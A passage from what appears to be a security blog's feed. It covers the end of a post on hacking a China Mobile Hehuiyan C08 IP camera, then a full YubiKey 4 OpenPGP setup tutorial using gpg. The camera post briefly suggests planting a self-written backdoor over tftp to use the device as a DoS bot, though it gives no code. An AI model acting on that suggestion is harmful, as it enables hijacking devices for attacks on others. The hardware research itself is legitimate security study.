href="https://obsproject.com/" target="_blank" rel="noopener">OBS</a> and using it as a live-streaming camera.</p><p>Add the RTSP stream as a media source in OBS</p><p><img src="//files.iternull.com/images/2017-12-26_01-0019.png" alt=""></p><p><img src="//files.iternull.com/images/2017-12-26_01-0020.png" alt=""></p><h3 id="7-2-作为-DoS-肉鸡"><a href="#7-2-作为-DoS-肉鸡" class="headerlink" title="7.2 作为 DoS 肉鸡"></a>7.2 As a DoS Bot</h3><p>This IPCamera still has spare storage, the <code>/mnt/</code> directory is writable, and the system ships with usable <code>tftp</code> and <code>tftpd</code> programs, so you can write your own backdoor program, compile it and transfer it to the device over FTP.</p><hr><ul><li>Note: these vulnerabilities have been fixed in the latest firmware version</li></ul>]]></content>
<summary type="html">
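<p><a href="http://www.hehuiyan.com/" target="_blank" rel="noopener">和慧眼</a> (Hehuiyan) is a camera-based network surveillance service platform launched by China Mobile, with several smart camera devices in its lineup. The one studied here is the C08 model.<br>One difference between an IPCamera and a WebCam is that an IPCamera has no web console: you can only control the device through the vendor's APP and cannot control it through a web page on the LAN.<br>In addition, an IPCamera basically always has to connect to the Internet and use the vendor's cloud platform, which means your data is all transmitted to the cloud, and you may also have to pay extra to rent access to its cloud platform features.<br>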
</summary>
<category term="Hardware" scheme="https://blog.iternull.com/tags/Hardware/"/>
<category term="Reverse Engineering" scheme="https://blog.iternull.com/tags/Reverse-Engineering/"/>
<category term="Hacking" scheme="https://blog.iternull.com/tags/Hacking/"/>
<category term="IPCamera" scheme="https://blog.iternull.com/tags/IPCamera/"/>
</entry>
<entry>
<title>YubiKey 4 PGP Feature Tutorial</title>
<link href="https://blog.iternull.com/posts/2017/06/03/YubiKey-4-GPG-Tutorial.html"/>
<id>https://blog.iternull.com/posts/2017/06/03/YubiKey-4-GPG-Tutorial.html</id>
<published>2017-06-02T16:23:15.000Z</published>
<updated>2017-06-05T19:27:00.990Z</updated>
<content type="html"><![CDATA[<p><a href="https://www.yubico.com/" target="_blank" rel="noopener">YubiKey</a> is a hardware device for secure authentication. Of its models, the YubiKey 4, YubiKey 4 Nano, YubiKey 4C, YubiKey NEO and YubiKey NEO-n include the OpenPGP Card function.</p><p>You can move your private key onto the YubiKey and plug it in when you need it, without worrying that the private key will leak or be stolen by malware; it also works on multiple operating systems.</p><a id="more"></a><h2 id="1、生成密钥对"><a href="#1、生成密钥对" class="headerlink" title="1、生成密钥对"></a>1. Generating a key pair</h2><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">$ gpg --gen-key</span><br><span class="line"></span><br><span class="line">gpg (GnuPG) 2.0.30; Copyright (C) 2015 Free Software Foundation, Inc.</span><br><span class="line">This is free software: you are free to change and redistribute it.</span><br><span class="line">There is NO WARRANTY, to the extent permitted by law.</span><br><span class="line"></span><br><span class="line">Please select what kind of key you want:</span><br><span class="line"> (1) RSA and RSA (default)</span><br><span class="line"> (2) DSA and Elgamal</span><br><span class="line"> (3) DSA (sign only)</span><br><span class="line"> (4) RSA (sign only)</span><br><span class="line">Your selection? 1 // enter 1 to select the default RSA algorithm</span><br><span class="line">RSA keys may be between 1024 and 4096 bits long.</span><br><span class="line">What keysize <span class="keyword">do</span> you want? (2048) 4096</span><br><span class="line">Requested keysize is 4096 bits</span><br><span class="line">Please specify how long the key should be valid.</span><br><span class="line"> 0 = key does not expire</span><br><span class="line"> <n> = key expires <span class="keyword">in</span> n days</span><br><span class="line"> <n>w = key expires <span class="keyword">in</span> n weeks</span><br><span class="line"> <n>m = key expires <span class="keyword">in</span> n months</span><br><span class="line"> <n>y = key expires <span class="keyword">in</span> n years</span><br><span class="line">Key is valid <span class="keyword">for</span>? (0) // press Enter to accept the default 0 (never expires)</span><br><span class="line">Key does not expire at all</span><br><span class="line">Is this correct? (y/N) y // enter y to confirm and continue</span><br><span class="line"></span><br><span class="line">GnuPG needs to construct a user ID to identify your key.</span><br><span class="line"></span><br><span class="line">Real name: Test User // enter your name</span><br><span class="line">Email address: <span class="built_in">test</span>@example.com // enter your email address</span><br><span class="line">Comment: // enter an optional comment, such as your online ID, or press Enter to skip</span><br><span class="line">You selected this USER-ID:</span><br><span class="line"> <span class="string">"Test User <test@example.com>"</span></span><br><span class="line"></span><br><span class="line">Change (N)ame, (C)omment, (E)mail or (O)kay/(Q)uit? o // enter o; after pressing Enter you are asked to set a passphrase for the private key</span><br><span class="line">You need a Passphrase to protect your secret key.</span><br><span class="line"></span><br><span class="line">We need to generate a lot of random bytes. It is a good idea to perform</span><br><span class="line">some other action (<span class="built_in">type</span> on the keyboard, move the mouse, utilize the</span><br><span class="line">disks) during the prime generation; this gives the random number</span><br><span class="line">generator a better chance to gain enough entropy.</span><br><span class="line">We need to generate a lot of random bytes. 
It is a good idea to perform</span><br><span class="line">some other action (<span class="built_in">type</span> on the keyboard, move the mouse, utilize the</span><br><span class="line">disks) during the prime generation; this gives the random number</span><br><span class="line">generator a better chance to gain enough entropy.</span><br><span class="line">gpg: key A8C37A46 marked as ultimately trusted</span><br><span class="line">public and secret key created and signed.</span><br><span class="line"></span><br><span class="line">gpg: checking the trustdb</span><br><span class="line">gpg: 3 marginal(s) needed, 1 complete(s) needed, PGP trust model</span><br><span class="line">gpg: depth: 0 valid: 2 signed: 0 trust: 0-, 0q, 0n, 0m, 0f, 2u</span><br><span class="line">pub 4096R/F891791F 2017-05-29</span><br><span class="line"> Key fingerprint = 628C 7B5D D284 224A 3321 4369 BC71 9F68 F891 791F</span><br><span class="line">uid [ultimate] Test User <<span class="built_in">test</span>@example.com></span><br><span class="line">sub 4096R/46D4D220 2017-05-29</span><br></pre></td></tr></table></figure><h2 id="2、添加验证密钥"><a href="#2、添加验证密钥" class="headerlink" title="2、添加验证密钥"></a>2. Adding an authentication key</h2><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">$ gpg --expert --edit-key F891791F</span><br><span class="line"></span><br><span class="line">gpg (GnuPG) 2.0.30; Copyright (C) 2015 Free Software Foundation, Inc.</span><br><span class="line">This is free software: you are free to change and redistribute it.</span><br><span class="line">There is NO WARRANTY, to the extent permitted by law.</span><br><span class="line"></span><br><span class="line">Secret key is available.</span><br><span class="line"></span><br><span class="line">pub 4096R/F891791F created: 2017-05-29 expires: never usage: SC</span><br><span class="line"> trust: ultimate validity: ultimate</span><br><span class="line">sub 4096R/46D4D220 created: 2017-05-29 expires: never usage: E</span><br><span class="line">[ultimate] (1). Test User <<span class="built_in">test</span>@example.com></span><br><span class="line"></span><br><span class="line">gpg> addkey</span><br><span class="line">This key is not protected.</span><br><span class="line">Please select what kind of key you want:</span><br><span class="line"> (3) DSA (sign only)</span><br><span class="line"> (4) RSA (sign only)</span><br><span class="line"> (5) Elgamal (encrypt only)</span><br><span class="line"> (6) RSA (encrypt only)</span><br><span class="line"> (7) DSA (<span class="built_in">set</span> your own capabilities)</span><br><span class="line"> (8) RSA (<span class="built_in">set</span> your own capabilities)</span><br><span class="line">Your selection? 
8</span><br><span class="line"></span><br><span class="line">Possible actions <span class="keyword">for</span> a RSA key: Sign Encrypt Authenticate</span><br><span class="line">Current allowed actions: Sign Encrypt</span><br><span class="line"></span><br><span class="line"> (S) Toggle the sign capability</span><br><span class="line"> (E) Toggle the encrypt capability</span><br><span class="line"> (A) Toggle the authenticate capability</span><br><span class="line"> (Q) Finished</span><br><span class="line"></span><br><span class="line">Your selection? A</span><br><span class="line"></span><br><span class="line">Possible actions <span class="keyword">for</span> a RSA key: Sign Encrypt Authenticate</span><br><span class="line">Current allowed actions: Sign Encrypt Authenticate</span><br><span class="line"></span><br><span class="line"> (S) Toggle the sign capability</span><br><span class="line"> (E) Toggle the encrypt capability</span><br><span class="line"> (A) Toggle the authenticate capability</span><br><span class="line"> (Q) Finished</span><br><span class="line"></span><br><span class="line">Your selection? S</span><br><span class="line"></span><br><span class="line">Possible actions <span class="keyword">for</span> a RSA key: Sign Encrypt Authenticate</span><br><span class="line">Current allowed actions: Encrypt Authenticate</span><br><span class="line"></span><br><span class="line"> (S) Toggle the sign capability</span><br><span class="line"> (E) Toggle the encrypt capability</span><br><span class="line"> (A) Toggle the authenticate capability</span><br><span class="line"> (Q) Finished</span><br><span class="line"></span><br><span class="line">Your selection? 
E</span><br><span class="line"></span><br><span class="line">Possible actions <span class="keyword">for</span> a RSA key: Sign Encrypt Authenticate</span><br><span class="line">Current allowed actions: Authenticate</span><br><span class="line"></span><br><span class="line"> (S) Toggle the sign capability</span><br><span class="line"> (E) Toggle the encrypt capability</span><br><span class="line"> (A) Toggle the authenticate capability</span><br><span class="line"> (Q) Finished</span><br><span class="line"></span><br><span class="line">Your selection? Q</span><br><span class="line">RSA keys may be between 1024 and 4096 bits long.</span><br><span class="line">What keysize <span class="keyword">do</span> you want? (2048) 4096</span><br><span class="line">Requested keysize is 4096 bits</span><br><span class="line">Please specify how long the key should be valid.</span><br><span class="line"> 0 = key does not expire</span><br><span class="line"> <n> = key expires <span class="keyword">in</span> n days</span><br><span class="line"> <n>w = key expires <span class="keyword">in</span> n weeks</span><br><span class="line"> <n>m = key expires <span class="keyword">in</span> n months</span><br><span class="line"> <n>y = key expires <span class="keyword">in</span> n years</span><br><span class="line">Key is valid <span class="keyword">for</span>? (0)</span><br><span class="line">Key does not expire at all</span><br><span class="line">Is this correct? (y/N) y</span><br><span class="line">Really create? (y/N) y</span><br><span class="line">We need to generate a lot of random bytes. 
It is a good idea to perform</span><br><span class="line">some other action (<span class="built_in">type</span> on the keyboard, move the mouse, utilize the</span><br><span class="line">disks) during the prime generation; this gives the random number</span><br><span class="line">generator a better chance to gain enough entropy.</span><br><span class="line"></span><br><span class="line">pub 4096R/F891791F created: 2017-05-29 expires: never usage: SC</span><br><span class="line"> trust: ultimate validity: ultimate</span><br><span class="line">sub 4096R/46D4D220 created: 2017-05-29 expires: never usage: E</span><br><span class="line">sub 4096R/C10AE6D4 created: 2017-05-29 expires: never usage: A</span><br><span class="line">[ultimate] (1). Test User <<span class="built_in">test</span>@example.com></span><br><span class="line"></span><br><span class="line">gpg> q</span><br><span class="line">Save changes? (y/N) y</span><br></pre></td></tr></table></figure><h2 id="3、备份密钥"><a href="#3、备份密钥" class="headerlink" title="3、备份密钥"></a>3. Backing up the keys</h2><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">gpg --armor --output public-key.asc --<span class="built_in">export</span> F891791F # export the public key to a file</span><br><span class="line">gpg --armor --output private-key.asc --<span class="built_in">export</span>-secret-keys F891791F # export the private key to a file</span><br><span class="line">gpg --armor --output subkeys-key.asc --<span class="built_in">export</span>-secret-subkeys F891791F # export the subkeys to a file</span><br></pre></td></tr></table></figure><h2 id="4、设置-OpenPGP-卡"><a href="#4、设置-OpenPGP-卡" class="headerlink" title="4、设置 OpenPGP 卡"></a>4. Setting up the OpenPGP card</h2><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">$ gpg --card-edit</span><br><span class="line"></span><br><span class="line">Application ID ...: D2760001240102000060000000420000</span><br><span class="line">Version ..........: 2.1</span><br><span class="line">Manufacturer .....: Yubico</span><br><span class="line">Serial number ....: 00000042</span><br><span class="line">Name of cardholder: [not <span class="built_in">set</span>]</span><br><span class="line">Language prefs ...: [not <span class="built_in">set</span>]</span><br><span class="line">Sex ..............: unspecified</span><br><span class="line">URL of public key : [not <span class="built_in">set</span>]</span><br><span class="line">Login data .......: [not <span class="built_in">set</span>]</span><br><span class="line">Signature PIN ....: forced</span><br><span class="line">Key attributes ...: 2048R 2048R 2048R</span><br><span 
class="line">Max. PIN lengths .: 127 127 127</span><br><span class="line">PIN retry counter : 3 0 3</span><br><span class="line">Signature counter : 0</span><br><span class="line">Signature key ....: [none]</span><br><span class="line">Encryption key....: [none]</span><br><span class="line">Authentication key: [none]</span><br><span class="line">General key info..: [none]</span><br><span class="line"></span><br><span class="line">gpg/card> admin // enter admin mode</span><br><span class="line">Admin commands are allowed</span><br><span class="line"></span><br><span class="line">gpg/card> passwd // set the passwords</span><br><span class="line">gpg: OpenPGP card no. D2760001240102000060000000420000 detected</span><br><span class="line"></span><br><span class="line">1 - change PIN</span><br><span class="line">2 - unblock PIN</span><br><span class="line">3 - change Admin PIN</span><br><span class="line">4 - <span class="built_in">set</span> the Reset Code</span><br><span class="line">Q - quit</span><br><span class="line"></span><br><span class="line">Your selection? 1 // enter 1 to set the user PIN; the default PIN is 123456, which is what a new or reset device uses.</span><br><span class="line">PIN changed. // you are first asked for the current user PIN, then for the new PIN, then to confirm the new PIN. Entering the current PIN incorrectly 3 times locks it.</span><br><span class="line"></span><br><span class="line">1 - change PIN</span><br><span class="line">2 - unblock PIN</span><br><span class="line">3 - change Admin PIN</span><br><span class="line">4 - <span class="built_in">set</span> the Reset Code</span><br><span class="line">Q - quit</span><br><span class="line"></span><br><span class="line">Your selection? 3 // enter 3 to set the Admin PIN; the default PIN is 12345678, which is what a new or reset device uses.</span><br><span class="line">PIN changed. // you are first asked for the current Admin PIN, then for the new PIN, then to confirm the new PIN. Entering the current PIN incorrectly 3 times locks it.</span><br><span class="line"></span><br><span class="line">1 - change PIN</span><br><span class="line">2 - unblock PIN</span><br><span class="line">3 - change Admin PIN</span><br><span class="line">4 - <span class="built_in">set</span> the Reset Code</span><br><span class="line">Q - quit</span><br><span class="line"></span><br><span class="line">Your selection? 2 // (optional) enter 2 to set the unblock PIN, i.e. the unlock code, which is used to unlock a locked user PIN and set a new user PIN. The unblock PIN can only unlock the user PIN, not the Admin PIN.</span><br><span class="line">PIN unblocked and new PIN <span class="built_in">set</span>. // you are first asked for the current Admin PIN, then for the new unblock PIN, then to confirm the new unblock PIN.</span><br><span class="line"></span><br><span class="line">1 - change PIN</span><br><span class="line">2 - unblock PIN</span><br><span class="line">3 - change Admin PIN</span><br><span class="line">4 - <span class="built_in">set</span> the Reset Code</span><br><span class="line">Q - quit</span><br><span class="line"></span><br><span class="line">Your selection? q // enter q to leave the password menu</span><br><span class="line"></span><br><span class="line">gpg/card> name // set the name</span><br><span class="line">Cardholder<span class="string">'s surname: User // surname of the cardholder</span></span><br><span class="line"><span class="string">Cardholder'</span>s given name: Test // given name of the cardholder</span><br><span class="line"></span><br><span class="line">gpg/card> lang // set the language</span><br><span class="line">Language preferences: en</span><br><span class="line"></span><br><span class="line">gpg/card> sex // set the sex: M for male, F for female</span><br><span class="line">Sex ((M)ale, (F)emale or space): m</span><br><span class="line"></span><br><span class="line">gpg/card> url // set the URL of the public key</span><br><span class="line">URL to retrieve public key: https://www.example.com/public-key.asc // the URL</span><br><span class="line"></span><br><span class="line">gpg/card> login // set the login name</span><br><span class="line">Login data (account name): <span class="built_in">test</span></span><br><span class="line"></span><br><span class="line">gpg/card> </span><br><span class="line"></span><br><span class="line">Application ID ...: D2760001240102000060000000420000</span><br><span class="line">Version ..........: 2.1</span><br><span class="line">Manufacturer .....: Yubico</span><br><span class="line">Serial number ....: 00000042</span><br><span class="line">Name of cardholder: Test User</span><br><span class="line">Language prefs ...: en</span><br><span class="line">Sex ..............: male</span><br><span class="line">URL of public key : https://www.example.com/public-key.asc</span><br><span class="line">Login data .......: <span class="built_in">test</span></span><br><span class="line">Signature PIN ....: forced</span><br><span class="line">Key attributes ...: 2048R 2048R 2048R</span><br><span class="line">Max. 
PIN lengths .: 127 127 127</span><br><span class="line">PIN retry counter : 3 3 3 // 3 3 3 are the retry counters for the user PIN, the unblock PIN and the Admin PIN respectively; each defaults to 3 and drops by 1 per wrong entry, the PIN is locked when it reaches 0, and entering the correct PIN before that restores the counter automatically.</span><br><span class="line">Signature counter : 0</span><br><span class="line">Signature key ....: [none]</span><br><span class="line">Encryption key....: [none]</span><br><span class="line">Authentication key: [none]</span><br><span class="line">General key info..: [none]</span><br><span class="line"></span><br><span class="line">gpg/card> quit // leave the OpenPGP card setup</span><br></pre></td></tr></table></figure><ul><li>Note: the YubiKey 4 introduced a new feature whereby a signing, decryption or authentication operation is performed only after the user has entered the correct PIN and <strong>touched the device</strong>. See <a href="https://developers.yubico.com/PGP/Card_edit.html" target="_blank" rel="noopener">YubiKey 4 touch</a> for details.</li></ul><h2 id="5、移动密钥到-YubiKey-4"><a href="#5、移动密钥到-YubiKey-4" class="headerlink" title="5、移动密钥到 YubiKey 4"></a>5. Moving the keys to the YubiKey 4</h2><ul><li>Note: the OpenPGP Card supports generating a key pair directly on its own hardware, but most users of PGP asymmetric encryption already have their own keys, so here the existing keys are moved onto the YubiKey. To generate a key pair directly on the hardware, use the <code>generate</code> command in admin mode; keys generated this way cannot be exported for backup!</li></ul><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">$ gpg --edit-key F891791F</span><br><span class="line"></span><br><span class="line">gpg (GnuPG) 2.0.30; Copyright (C) 2015 Free Software Foundation, Inc.</span><br><span class="line">This is free software: you are free to change and redistribute it.</span><br><span class="line">There is NO WARRANTY, to the extent permitted by law.</span><br><span class="line"></span><br><span class="line">Secret key is available.</span><br><span class="line"></span><br><span class="line">pub 4096R/F891791F created: 2017-05-29 expires: never usage: SC</span><br><span class="line"> trust: ultimate validity: ultimate</span><br><span class="line">sub 4096R/46D4D220 created: 2017-05-29 expires: never usage: E</span><br><span class="line">sub 4096R/C10AE6D4 created: 2017-05-29 expires: never usage: A</span><br><span class="line">[ultimate] (1). 
Test User <<span class="built_in">test</span>@example.com></span><br><span class="line"></span><br><span class="line">gpg> toggle</span><br><span class="line"></span><br><span class="line">sec 4096R/F891791F created: 2017-05-29 expires: never</span><br><span class="line">ssb 4096R/46D4D220 created: 2017-05-29 expires: never</span><br><span class="line">ssb 4096R/C10AE6D4 created: 2017-05-29 expires: never</span><br><span class="line">(1) Test User <<span class="built_in">test</span>@example.com></span><br><span class="line"></span><br><span class="line">gpg> keytocard</span><br><span class="line">Really move the primary key? (y/N) y</span><br><span class="line">Signature key ....: [none]</span><br><span class="line">Encryption key....: [none]</span><br><span class="line">Authentication key: [none]</span><br><span class="line"></span><br><span class="line">Please select <span class="built_in">where</span> to store the key:</span><br><span class="line"> (1) Signature key</span><br><span class="line"> (3) Authentication key</span><br><span class="line">Your selection? 
1</span><br><span class="line"></span><br><span class="line">You need a passphrase to unlock the secret key <span class="keyword">for</span></span><br><span class="line">user: <span class="string">"Test User <test@example.com>"</span></span><br><span class="line">4096-bit RSA key, ID F891791F, created 2017-05-29</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">sec 4096R/F891791F created: 2017-05-29 expires: never</span><br><span class="line"> card-no: 0006 00000042</span><br><span class="line">ssb 4096R/46D4D220 created: 2017-05-29 expires: never</span><br><span class="line">ssb 4096R/C10AE6D4 created: 2017-05-29 expires: never</span><br><span class="line">(1) Test User <<span class="built_in">test</span>@example.com></span><br><span class="line"></span><br><span class="line">gpg> key 1</span><br><span class="line"></span><br><span class="line">sec 4096R/F891791F created: 2017-05-29 expires: never</span><br><span class="line"> card-no: 0006 00000042</span><br><span class="line">ssb* 4096R/46D4D220 created: 2017-05-29 expires: never</span><br><span class="line">ssb 4096R/C10AE6D4 created: 2017-05-29 expires: never</span><br><span class="line">(1) Test User <<span class="built_in">test</span>@example.com></span><br><span class="line"></span><br><span class="line">gpg> keytocard</span><br><span class="line">Signature key ....: 743A 2D58 688A 9E9E B4FC 493F 70D1 D7A8 13AF CE85</span><br><span class="line">Encryption key....: [none]</span><br><span class="line">Authentication key: [none]</span><br><span class="line"></span><br><span class="line">Please select <span class="built_in">where</span> to store the key:</span><br><span class="line"> (2) Encryption key</span><br><span class="line">Your selection? 
2</span><br><span class="line"></span><br><span class="line">You need a passphrase to unlock the secret key <span class="keyword">for</span></span><br><span class="line">user: <span class="string">"Test User <test@example.com>"</span></span><br><span class="line">4096-bit RSA key, ID 46D4D220, created 2017-05-29</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">sec 4096R/F891791F created: 2017-05-29 expires: never</span><br><span class="line"> card-no: 0006 00000042</span><br><span class="line">ssb* 4096R/46D4D220 created: 2017-05-29 expires: never</span><br><span class="line"> card-no: 0006 00000042</span><br><span class="line">ssb 4096R/C10AE6D4 created: 2017-05-29 expires: never</span><br><span class="line">(1) Test User <<span class="built_in">test</span>@example.com></span><br><span class="line"></span><br><span class="line">gpg> key 1</span><br><span class="line"></span><br><span class="line">sec 4096R/F891791F created: 2017-05-29 expires: never</span><br><span class="line"> card-no: 0006 00000042</span><br><span class="line">ssb 4096R/46D4D220 created: 2017-05-29 expires: never</span><br><span class="line"> card-no: 0006 00000042</span><br><span class="line">ssb 4096R/C10AE6D4 created: 2017-05-29 expires: never</span><br><span class="line">(1) Test User <<span class="built_in">test</span>@example.com></span><br><span class="line"></span><br><span class="line">gpg> key 2</span><br><span class="line"></span><br><span class="line">sec 4096R/F891791F created: 2017-05-29 expires: never</span><br><span class="line"> card-no: 0006 00000042</span><br><span class="line">ssb 4096R/46D4D220 created: 2017-05-29 expires: never</span><br><span class="line"> card-no: 0006 00000042</span><br><span class="line">ssb* 4096R/C10AE6D4 created: 2017-05-29 expires: never</span><br><span class="line">(1) Test User <<span class="built_in">test</span>@example.com></span><br><span class="line"></span><br><span class="line">gpg> 
keytocard</span><br><span class="line">Signature key ....: 743A 2D58 688A 9E9E B4FC 493F 70D1 D7A8 13AF CE85</span><br><span class="line">Encryption key....: 8D17 89A0 5C2F B804 22E5 5C04 8A68 9CC0 D742 1CDF</span><br><span class="line">Authentication key: [none]</span><br><span class="line"></span><br><span class="line">Please select <span class="built_in">where</span> to store the key:</span><br><span class="line"> (3) Authentication key</span><br><span class="line">Your selection? 3</span><br><span class="line"></span><br><span class="line">You need a passphrase to unlock the secret key <span class="keyword">for</span></span><br><span class="line">user: <span class="string">"Test User <test@example.com>"</span></span><br><span class="line">4096-bit RSA key, ID C10AE6D4, created 2017-05-29</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">sec 4096R/F891791F created: 2017-05-29 expires: never</span><br><span class="line"> card-no: 0006 00000042</span><br><span class="line">ssb 4096R/46D4D220 created: 2017-05-29 expires: never</span><br><span class="line"> card-no: 0006 00000042</span><br><span class="line">ssb* 4096R/C10AE6D4 created: 2017-05-29 expires: never</span><br><span class="line"> card-no: 0006 00000042</span><br><span class="line">(1) Test User <<span class="built_in">test</span>@example.com></span><br><span class="line"></span><br><span class="line">gpg> quit</span><br><span class="line">Save changes? 
(y/N) y</span><br></pre></td></tr></table></figure><p>Once the keys have been moved to the OpenPGP card, you can no longer export a private key that can be used without the hardware card. If you did not export a backup of the keys in the steps above, the private keys on the OpenPGP card will be your only copy and cannot be backed up.</p><p>View the OpenPGP card status</p><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">$ gpg --card-status</span><br><span class="line"></span><br><span class="line">Application ID ...: D2760001240102000060000000420000</span><br><span class="line">Version ..........: 2.1</span><br><span class="line">Manufacturer .....: Yubico</span><br><span class="line">Serial number ....: 00000042</span><br><span class="line">Name of cardholder: Test User</span><br><span class="line">Language prefs ...: en</span><br><span class="line">Sex ..............: male</span><br><span class="line">URL of public key : https://www.example.com/public-key.asc</span><br><span class="line">Login data .......: <span class="built_in">test</span></span><br><span class="line">Signature PIN ....: forced</span><br><span class="line">Key attributes ...: 4096R 4096R 4096R</span><br><span class="line">Max. 
PIN lengths .: 127 127 127</span><br><span class="line">PIN retry counter : 3 3 3</span><br><span class="line">Signature counter : 0</span><br><span class="line">Signature key ....: 743A 2D58 688A 9E9E B4FC 493F 70D1 D7A8 13AF CE85</span><br><span class="line"> created ....: 2017-05-29 22:11:07</span><br><span class="line">Encryption key....: 8D17 89A0 5C2F B804 22E5 5C04 8A68 9CC0 D742 1CDF</span><br><span class="line"> created ....: 2017-05-29 22:11:07</span><br><span class="line">Authentication key: 628C 7B5D D284 224A 3321 4369 BC71 9F68 F891 791F</span><br><span class="line"> created ....: 2017-05-29 22:11:07</span><br><span class="line">General key info..: pub 4096R/F891791F 2017-05-29 Test User <<span class="built_in">test</span>@example.com></span><br><span class="line">sec> 4096R/F891791F created: 2017-05-29 expires: never</span><br><span class="line"> card-no: 0006 00000042</span><br><span class="line">ssb> 4096R/46D4D220 created: 2017-05-29 expires: never</span><br><span class="line"> card-no: 0006 00000042</span><br><span class="line">ssb> 4096R/C10AE6D4 created: 2017-05-29 expires: never</span><br><span class="line"> card-no: 0006 00000042</span><br></pre></td></tr></table></figure><h2 id="6、在其他电脑上使用"><a href="#6、在其他电脑上使用" class="headerlink" title="6. Using it on other computers"></a>6. Using it on other computers</h2><p>Once a YubiKey has been configured as an OpenPGP smart card, you can plug it into any other computer that has a PGP client and use your private keys to sign, encrypt and authenticate, without worrying about the private keys leaking.</p><p>Import the public key from a file</p><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">gpg --import public-key.asc</span><br></pre></td></tr></table></figure><p>Or import the public key from a key server</p><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">gpg --keyserver keys.gnupg.net --recv 0xF891791F</span><br></pre></td></tr></table></figure><p>Insert the YubiKey and view the OpenPGP card information. This step automatically maps the private keys on the YubiKey into the local OpenPGP configuration.</p><figure 
class="highlight bash"><table><tr><td class="code"><pre><span class="line">gpg --card-status</span><br></pre></td></tr></table></figure><p>Set the key's trust level on this system</p><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">$ gpg --edit-key F891791F</span><br><span class="line"></span><br><span class="line">gpg (GnuPG) 1.4.21; Copyright (C) 2015 Free Software Foundation, Inc.</span><br><span class="line">This is free software: you are free to change and redistribute it.</span><br><span class="line">There is NO WARRANTY, to the extent 
permitted by law.</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">pub 4096R/F891791F created: 2017-05-29 expires: never usage: SC</span><br><span class="line"> trust: ultimate validity: ultimate</span><br><span class="line">sub 4096R/46D4D220 created: 2017-05-29 expires: never usage: E</span><br><span class="line">sub 4096R/C10AE6D4 created: 2017-05-29 expires: never usage: A</span><br><span class="line">[ unknown] (1). Test User <<span class="built_in">test</span>@example.com></span><br><span class="line"></span><br><span class="line">gpg> trust</span><br><span class="line">pub 4096R/F891791F created: 2017-05-29 expires: never usage: SC</span><br><span class="line"> trust: unknown validity: unknown</span><br><span class="line">sub 4096R/46D4D220 created: 2017-05-29 expires: never usage: E</span><br><span class="line">sub 4096R/C10AE6D4 created: 2017-05-29 expires: never usage: A</span><br><span class="line">[unknown] (1). Test User <<span class="built_in">test</span>@example.com></span><br><span class="line"></span><br><span class="line">Please decide how far you trust this user to correctly verify other users<span class="string">' keys</span></span><br><span class="line"><span class="string">(by looking at passports, checking fingerprints from different sources, etc.)</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> 1 = I don'</span>t know or won<span class="string">'t say</span></span><br><span class="line"><span class="string"> 2 = I do NOT trust</span></span><br><span class="line"><span class="string"> 3 = I trust marginally</span></span><br><span class="line"><span class="string"> 4 = I trust fully</span></span><br><span class="line"><span class="string"> 5 = I trust ultimately</span></span><br><span class="line"><span class="string"> m = back to the main menu</span></span><br><span class="line"><span class="string"></span></span><br><span 
class="line"><span class="string">Your decision? 5 // enter 5 to set ultimate trust</span></span><br><span class="line"><span class="string">Do you really want to set this key to ultimate trust? (y/N) y</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">pub 4096R/F891791F created: 2017-05-29 expires: never usage: SC</span></span><br><span class="line"><span class="string"> trust: ultimate validity: unknown</span></span><br><span class="line"><span class="string">sub 4096R/46D4D220 created: 2017-05-29 expires: never usage: E</span></span><br><span class="line"><span class="string">sub 4096R/C10AE6D4 created: 2017-05-29 expires: never usage: A</span></span><br><span class="line"><span class="string">[unknown] (1). Test User <test@example.com></span></span><br><span class="line"><span class="string">Please note that the shown key validity is not necessarily correct</span></span><br><span class="line"><span class="string">unless you restart the program.</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">gpg> q</span></span><br></pre></td></tr></table></figure><p>List the keys on this system</p><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">$ gpg -k // list all public keys</span><br><span class="line"></span><br><span class="line">~/.gnupg/pubring.gpg</span><br><span 
class="line">-----------------------------------------------</span><br><span class="line">pub 4096R/F891791F 2017-05-29</span><br><span class="line">uid [ultimate] Test User <<span class="built_in">test</span>@example.com></span><br><span class="line">sub 4096R/46D4D220 2017-05-29</span><br><span class="line">sub 4096R/C10AE6D4 2017-05-29</span><br><span class="line"></span><br><span class="line">$ gpg -K // list all private keys</span><br><span class="line"></span><br><span class="line">~/.gnupg/secring.gpg</span><br><span class="line">-----------------------------------------------</span><br><span class="line">sec> 4096R/F891791F 2017-05-29</span><br><span class="line"> Card serial no. = 0006 00000042 // this shows that the private key entry points to the OpenPGP smart card</span><br><span class="line">uid Test User <<span class="built_in">test</span>@example.com></span><br><span class="line">ssb> 4096R/46D4D220 2017-05-29</span><br><span class="line">ssb> 4096R/C10AE6D4 2017-05-29</span><br></pre></td></tr></table></figure><p>Encrypt a file with the public key</p><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">gpg -ea -r <span class="built_in">test</span>@example.com msg.txt</span><br></pre></td></tr></table></figure><p>Decrypt a file with the private key</p><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">gpg msg.txt.asc</span><br></pre></td></tr></table></figure><p>Sign a file</p><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">gpg -o msg.txt.sig -ab msg.txt</span><br></pre></td></tr></table></figure><p>Verify a signature</p><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">gpg --verify msg.txt.sig</span><br></pre></td></tr></table></figure><h2 id="7、重置-YubiKey-4-PGP-功能"><a 
